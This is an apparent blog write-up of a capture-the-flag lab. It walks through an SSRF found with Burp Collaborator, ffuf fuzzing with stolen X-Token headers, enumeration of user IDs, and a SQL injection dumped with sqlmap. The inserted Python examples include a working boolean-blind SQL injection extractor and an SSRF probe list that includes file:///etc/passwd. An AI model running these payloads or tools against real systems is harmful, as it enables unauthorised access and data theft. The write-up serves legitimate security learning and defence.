Attacking VulnTraining Part 6

We are back attacking VulnTraining, it is the weekend and I am looking to finish this sucker off. Last time we found the api URL parameter but were not able to exploit it. I am going to keep focusing there.

I go back and look at what I attempted, still drawing a blank as to what is possible, so I quickly dump in a SQL injection payload (`'%20OR%201=1;--`) but there is no luck there. I really wish I got the API error, not just the 500 error response, but beggars cannot be choosers. I keep picking at it until eventually I decide to check the Discord server to see what clues are available. Part of me hates this, but another part realises that this is a hard challenge and I am not all-knowing when it comes to hacking; I am doing this to learn after all.

I find the clue to use Burp Collaborator Client and it hits me. I was trying to find the API that was used internally, e.g. `billing.vulntraining.co.uk?api=users`. I should have been trying to use an external API. I decide to try something by setting up an HTTP web server locally using Python before I use Collaborator. I grab my IP and start a server using `python -m http.server 8081`, but I cannot get any requests to come through, although this was a quick “I wonder what would happen” experiment.

Thankfully, through work I have access to Burp Collaborator. I start it up and I see a payload of a random string. I am not sure if this is a flag or a token; I test it as a flag but it does not work. I then try to hit the admin URL with this set as a token but still get unauthorised. I then notice that the string returned is actually the subdomain of the Collaborator session I am running, and it clicks that I should just put in the admin subdomain and see what I get back.

I try the admin subdomain as the api parameter and see the billing page load, however the flag that I see is one I have already captured. I decide to keep testing, passing the entire URL into ffuf to fuzz directories using `ffuf -t 4 -p 0.15 -w ~/ctfs/ctfchallenge/wordlists/content.txt -u http://billing.vulntraining.co.uk\?api\=admin.vulntraining.co.uk/FUZZ -H 'Cookie: ctfchallenge=[CTF_CHALLENGE_TOKEN]; token=[AUTH_TOKEN]' -mc all -fc 500 -fs 3547`, my hope being that I can bypass the auth checks.

I get no results; all I know is that the source of the billing data is an API on admin.vulntraining.co.uk. I decide to post a question in the Discord channel, but as soon as I do that, I go back to Burp Collaborator, realising that I did not check the request. Lo and behold, I am an idiot and flag 9 is there.
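The behaviour above, where whatever is passed in `?api=` gets fetched by the billing server itself (an out-of-band host, then the admin subdomain), is a server-side request forgery. The following is an added example, not VulnTraining's code, reconstructing the vulnerable "use the parameter as the upstream host" logic next to a hardened allowlist check. The allowed hostname `api.vulntraining.co.uk` and the `.oastify.example` out-of-band host are assumptions; only the admin subdomain comes from the write-up.

```python
"""Added example (not VulnTraining's code): how an `?api=<target>` parameter
that the billing page fetches server-side becomes SSRF, and a host allowlist
that closes it. Hostnames other than admin.vulntraining.co.uk are assumptions."""
from urllib.parse import urlparse

# Assumption: the single upstream the billing page is meant to call.
ALLOWED_API_HOSTS = {"api.vulntraining.co.uk"}
ALLOWED_SCHEMES = {"http", "https"}


def build_api_url(api_param: str) -> str:
    """Vulnerable behaviour as guessed from the write-up: the parameter is used
    as the upstream host/path unchanged, with a scheme bolted on if absent.
    Anything the attacker names (a Collaborator host, the admin subdomain) is
    fetched from the server's own network position, with its own headers."""
    if "://" in api_param:
        return api_param
    return "http://" + api_param


def validate_api_target(api_param: str) -> str:
    """Hardened version: parse the URL and only accept an exact allowlisted
    host, over http(s), on a default port. Raises ValueError otherwise."""
    url = build_api_url(api_param)
    parsed = urlparse(url)
    if parsed.scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {parsed.scheme!r}")
    # .hostname strips userinfo and port and lower-cases, so the userinfo trick
    # 'api.vulntraining.co.uk@admin.vulntraining.co.uk' parses as the admin host.
    if parsed.hostname not in ALLOWED_API_HOSTS:
        raise ValueError(f"host not allowed: {parsed.hostname!r}")
    try:
        port = parsed.port  # raises ValueError when the port text is not numeric
    except ValueError as exc:
        raise ValueError("malformed port") from exc
    if port not in (None, 80, 443):
        raise ValueError(f"port not allowed: {port}")
    return url


def is_allowed(api_param: str) -> bool:
    """Convenience wrapper around validate_api_target for yes/no checks."""
    try:
        validate_api_target(api_param)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    probes = [
        "api.vulntraining.co.uk/users",                      # legitimate upstream
        "admin.vulntraining.co.uk/admin/users/1",            # internal pivot from the write-up
        "abc123.oastify.example",                            # constructed out-of-band host
        "api.vulntraining.co.uk@admin.vulntraining.co.uk/",  # userinfo trick
        "file:///etc/passwd",                                # non-http scheme
    ]
    for p in probes:
        print(f"{p:52} fetches {build_api_url(p):55} allowed={is_allowed(p)}")
```

The allowlist compares the parsed hostname, not a prefix of the raw string, which is what defeats the userinfo and upper-case variants. It does not cover the upstream host resolving to an internal address (DNS rebinding) or following redirects from the upstream; a fetcher that resolves the name and rejects private ranges, and does not follow redirects, is still needed behind this check.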

Also returned is an X-Token header. I grab that and add it to the headers of the requests to the admin subdomain; it returns some JSON about a request ID and the endpoint used. I decide to fuzz using the new header I have found, using `ffuf -t 4 -p 0.1 -w ~/ctfs/ctfchallenge/wordlists/content.txt -u http://admin.vulntraining.co.uk/FUZZ -H $CTF_CHALLENGE_COOKIE -H 'X-Token: TOKEN_I_FOUND' -mc all -fc 404`.

From this I find two directories or endpoints, admin and invoices. I already know of invoices, so I decide to fuzz for any parameters I can find using `ffuf -t 3 -p 0.1 -w ~/ctfs/ctfchallenge/wordlists/parameters.txt -u http://admin.vulntraining.co.uk/invoices\?FUZZ\=1 -H $CTF_CHALLENGE_COOKIE -H 'X-Token: TOKEN_I_FOUND' -mc all -fc 404 -fs 865`. While I wait for that to complete I try to visit admin.vulntraining.co.uk/admin and I get an error about this user not having the relevant permissions.

Nothing is returned by the parameter fuzz, so all I know is that there is an endpoint /invoices. I call the endpoint and see the data from the list on the billing subdomain's initial page. I then try changing the endpoint called to include an ID, /invoices/1, and I get a single record back. I also try to create an invoice using a POST request but I get a 404 response.

One of the tips for another flag is to keep fuzzing, so I decide to see if I can access anything nested deeper under /admin using `ffuf -t 3 -p 0.1 -w ~/ctfs/ctfchallenge/wordlists/content.txt -u http://admin.vulntraining.co.uk/admin/FUZZ -H $CTF_CHALLENGE_COOKIE -H 'X-Token: 71e8b37bdc4c8edbf197d42f7c5ab56a' -mc all -fc 404`. This nets me the endpoint /admin/users. I load this in a browser and I get “User does not have permission”. I add /1 to make the entire URL admin.vulntraining.co.uk/admin/users/1 and I get a new response, “User not found”.

I quickly ascertain it only wants a number, so I create a list from 1 to 1000 and start fuzzing to see what I can get. I get two results. ID 3 gives me the token I already have, as it is attached to the user dominic.bryant; I note that dominic.bryant has an attribute of `"admin": false`. The second user I find, however, is an admin, and they also have flag 10 with them and a new token to use.

I grab the token and then try to load admin.vulntraining.co.uk, but I get nothing new, so I decide to take the username and see if I can crack the password for the phpMyAdmin page, but the short wordlist does not return any results. I also try the login page for the billing subdomain but get “Username is invalid”, meaning the user does not exist there at all.

The error message for /admin about the user not having permissions leads me to go back and visit it with the new token, and the response shows there is another endpoint, /admin/s3cr3t_m3ss4g3s. I load that and I get a new response leading me to /admin/s3cr3t_m3ss4g3s?id=2. This message states “Did you get my last message?”, so I instinctively go to /admin/s3cr3t_m3ss4g3s?id=1 but I get the response “Message is deleted”. I guess getting the original message is how I get the final flag.

I fuzz for other parameters using `ffuf -t 3 -p 0.1 -w ~/ctfs/ctfchallenge/wordlists/parameters.txt -u http://admin.vulntraining.co.uk/admin/s3cr3t_m3ss4g3s\?id\=1\&FUZZ\=1 -H $CTF_CHALLENGE_COOKIE -H 'X-Token: ADMIN_KEY' -mc all -fs 22`, filtering out anything that has a response size of 22 bytes, but nothing returns.

Disappointingly, I do remember seeing talk about a SQL injection in the Discord when looking for help with flag 9, so I decide to try that and determine there is a vulnerability around here. I come to the conclusion that the query most likely looks something like `SELECT * FROM messages WHERE deleted = false AND id = 1;`. This means I cannot simply disable the deleted flag, and since I cannot see the table information, it leaves me with blind SQL injection, so I pull up the SQL injection cheat sheet from PortSwigger.

However, before I do this, I try SQLMap by entering `sqlmap -u admin.vulntraining.co.uk/admin/s3cr3t_m3ss4g3s?id=2 -H "X-Token: 99663f8904af238fb1e3cedb2f8095f9" -H $CTF_CHALLENGE_COOKIE` into my terminal. It goes through and identifies the database type as MySQL and then the id parameter as injectable. I let it run and see that there are 3 columns in the query we are attacking; I would guess the fields are id, message and deleted. I find SQLMap so fascinating, one day I should read the source code for it, but all the power it does have is amazing to me.
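To make concrete what sqlmap is doing against the guessed `SELECT * FROM messages WHERE deleted = false AND id = 1` query, here is an added example, not VulnTraining's code, of that endpoint built by string concatenation, a direct bypass of the deleted filter through operator precedence, a boolean-based blind extraction of the hidden row (the technique sqlmap automates), and the parameterised fix. It uses Python's standard-library sqlite3 rather than the MySQL sqlmap identified, so `deleted = 0` stands in for `false` and `unicode()` for MySQL's `ORD()`; the table contents and the flag value are constructed.

```python
"""Added example (not VulnTraining's code): the guessed messages query built
from user input, a precedence bypass, a boolean-based blind extraction of the
deleted row, and the parameterised fix. sqlite3 stands in for MySQL; rows and
the flag are constructed."""
import sqlite3
from typing import Optional

FAKE_FLAG = "FLAG{constructed_example}"  # constructed, not the challenge flag


def build_db() -> sqlite3.Connection:
    """In-memory table shaped like the three columns sqlmap reported."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE messages (id INTEGER PRIMARY KEY, message TEXT, deleted INTEGER)"
    )
    conn.executemany(
        "INSERT INTO messages VALUES (?, ?, ?)",
        [(1, FAKE_FLAG, 1), (2, "Did you get my last message?", 0)],
    )
    return conn


def get_message_vulnerable(conn: sqlite3.Connection, id_param: str) -> Optional[str]:
    """The endpoint as guessed: id is dropped straight into the SQL text.
    Returns the message, or None (the app's 'Message is deleted' response)."""
    sql = ("SELECT id, message, deleted FROM messages "
           f"WHERE deleted = 0 AND id = {id_param}")
    row = conn.execute(sql).fetchone()
    return row[1] if row else None


def get_message_safe(conn: sqlite3.Connection, id_param: str) -> Optional[str]:
    """Fix: check the type, then bind the value; no SQL is built from input."""
    if not id_param.isdigit():
        return None
    row = conn.execute(
        "SELECT id, message, deleted FROM messages WHERE deleted = 0 AND id = ?",
        (int(id_param),),
    ).fetchone()
    return row[1] if row else None


def oracle(conn: sqlite3.Connection, condition: str) -> bool:
    """Boolean oracle: id=2 is the one visible row, so the response flips
    between the message and 'deleted' depending on the injected condition."""
    return get_message_vulnerable(conn, f"2 AND ({condition})") is not None


def extract_deleted_message(conn: sqlite3.Connection, target_id: int = 1,
                            max_len: int = 128) -> str:
    """Recover messages.message for a row the WHERE clause hides, one code
    point at a time by binary search over a subquery (sqlmap's boolean-based
    blind technique). Assumes printable ASCII content."""
    length = next(
        (n for n in range(1, max_len + 1)
         if oracle(conn, f"(SELECT length(message) FROM messages "
                         f"WHERE id = {target_id}) = {n}")),
        0,
    )
    out = []
    for pos in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            cond = (f"(SELECT unicode(substr(message, {pos}, 1)) "
                    f"FROM messages WHERE id = {target_id}) > {mid}")
            if oracle(conn, cond):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


if __name__ == "__main__":
    db = build_db()
    print(get_message_vulnerable(db, "1"))            # None: filtered by deleted = 0
    print(get_message_vulnerable(db, "0 OR id = 1"))  # AND binds tighter than OR
    print(extract_deleted_message(db))                # same value, recovered blind
    print(get_message_safe(db, "0 OR id = 1"))        # None: rejected before any SQL
```

The `0 OR id = 1` payload works because `deleted = 0 AND id = 0 OR id = 1` parses as `(deleted = 0 AND id = 0) OR id = 1`, so the deleted filter never applies to the injected row; the blind path is what you fall back to when the response only ever shows one row and you cannot see the result directly, and it costs about seven requests per character.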

I find out about the existence of the `--dump` option and I fall in love even more: it tells me the name of the DB, the names of the tables and even their contents, where I find the final flag. I pump that in and then decide to get some ice cream to celebrate.